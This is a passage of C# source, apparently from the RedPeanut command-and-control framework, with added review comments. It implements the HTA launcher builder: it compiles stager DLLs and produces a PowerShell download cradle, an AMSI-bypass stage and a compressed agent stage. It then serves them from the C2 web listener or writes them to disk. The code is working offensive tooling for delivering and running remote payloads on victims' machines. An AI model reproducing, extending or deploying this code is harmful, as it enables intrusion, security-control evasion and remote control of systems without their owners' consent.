                    string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                    source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 35, conf);
                    string outfilename = RandomAString(10, new Random()) + ".dll";
                    Builder.GenerateDll(source, outfilename, 35);
                    // NOTE(review): the DLL is registered on the web server unconditionally – before the
                    // `hosted` check below – so even a non-hosted build leaves this resource registered.
                    C2Manager c2manager = Program.GetC2Manager();
                    c2manager.GetC2Server().RegisterWebResource(outfilename, new WebResourceInstance(null, outfilename));
                    // Normalise the profile's content URI to "segment/" form.
                    string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri.TrimStart('/');
                    if (!uricontent.EndsWith("/"))
                    {
                        uricontent += "/";
                    }
                    string resourcepath = uricontent + outfilename;
                    // Build the shooter assembly that references the hosted DLL by resourcepath.
                    source = File.ReadAllText(Path.Combine(folderrpath, SHOOTER_TEMPLATE));
                    source = Replacer.ReplaceAgentShooter(source, resourcepath, conf);
                    string assemblyBase64 = Builder.GenerateDllBase64(source, RandomAString(10, new Random()) + ".dll", 35);
                    HtaVBSGenerator gen = new HtaVBSGenerator(assemblyBase64, null);
                    if (hosted)
                    {
                        // Add the HTA to webserver storage under `filename`.
                        c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen, filename));
                        Console.WriteLine("[*] Resource added to webserver resources");
                        // NOTE(review): scheme hard-coded to https regardless of the listener's SSL setting.
                        Console.WriteLine("[*] Starting point at https://{0}:{1}/{2}", lhost, lport, uricontent + filename);
                        return;
                    }
                    else
                    {
                        // Not hosted: write the HTA into the operator's temp directory.
                        File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen.GetScriptText());
                        Console.WriteLine("[*] {0} Created",
                                          Path.Combine(Path.GetTempPath(), filename));
                    }
                }
            }
            else
            {
                if (lang == "powershell")
                {
                    string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                    if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                    {
                        // This branch uses RandomString where the vbs branch uses RandomAString; both
                        // helpers are defined elsewhere, so the difference cannot be judged from here.
                        string psfilename = RandomString(10, new Random()) + ".ps1";
                        ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                        string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                        // `40` framework selector here versus `35` in the vbs branch.
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
                        string assemblyBase64 = Builder.GenerateDllBase64(source, RandomString(10, new Random()) + ".dll");
                        // Placeholders consumed by the PowerShell generators.
                        Dictionary<string, string> arg = new Dictionary<string, string>();
                        arg.Add("#{lhost}", lhost);
                        arg.Add("#{lport}", lport.ToString());
                        string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri;
                        uricontent = uricontent.TrimStart('/');
                        if (!uricontent.EndsWith("/"))
                        {
                            uricontent += "/";
                        }
                        arg.Add("#{uri}", uricontent + "s2_" + psfilename);
                        byte[] assemblybytte = Convert.FromBase64String(assemblyBase64);
                        string agentCompBase64 = Convert.ToBase64String(CompressAssembly(assemblybytte));
                        Dictionary<string, string> argagent = new Dictionary<string, string>();
                        // The second stage needs the uncompressed assembly length.
                        argagent.Add("#{bytelen}", assemblybytte.Length.ToString());
                        PowershellCradleGenerator gen_s0 = new PowershellCradleGenerator(agentCompBase64, arg);
                        PowershellAmsiGenerator gen_s1 = new PowershellAmsiGenerator(agentCompBase64, arg);
                        PowershellAgentGenerator gen_s2 = new PowershellAgentGenerator(agentCompBase64, argagent);
                        // The HTA wraps the cradle text; the two .ps1 stages are served/written separately.
                        HtaPowerShellGenerator gen = new HtaPowerShellGenerator(gen_s0.GetScriptText(), null);
                        if (hosted)
                        {
                            // Add the HTA and both PowerShell stages to webserver storage.
                            C2Manager c2manager = Program.GetC2Manager();
                            c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen, filename));
                            c2manager.GetC2Server().RegisterWebResource(psfilename, new WebResourceInstance(gen_s1, psfilename));
                            c2manager.GetC2Server().RegisterWebResource("s2_" + psfilename, new WebResourceInstance(gen_s2, "s2_" + psfilename));
                            Console.WriteLine("[*] Resource added to webserver resources");
                            // NOTE(review): scheme hard-coded to https regardless of the listener's SSL setting.
                            Console.WriteLine("[*] Starting point at https://{0}:{1}/{2}", lhost, lport, uricontent + filename);
                            return;
                        }
                        else
                        {
                            // Not hosted: write all three files into the operator's temp directory.
                            File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen.GetScriptText());
                            File.WriteAllText(Path.Combine(Path.GetTempPath(), psfilename), gen_s1.GetScriptText());
                            File.WriteAllText(Path.Combine(Path.GetTempPath(), "s2_" + psfilename), gen_s2.GetScriptText());
                            Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
                            Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), psfilename));
                            Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), "s2_" + psfilename));
                        }
                    }
                }
                else
                {
                    Console.WriteLine("[*] Language not supported {0} (powershell,vbs)", lang);
                    return;
                }
            }
        }
    }
    catch (Exception e)
    {
        Console.WriteLine("[*] Error running task build {0}", e.Message);
        return;
    }
}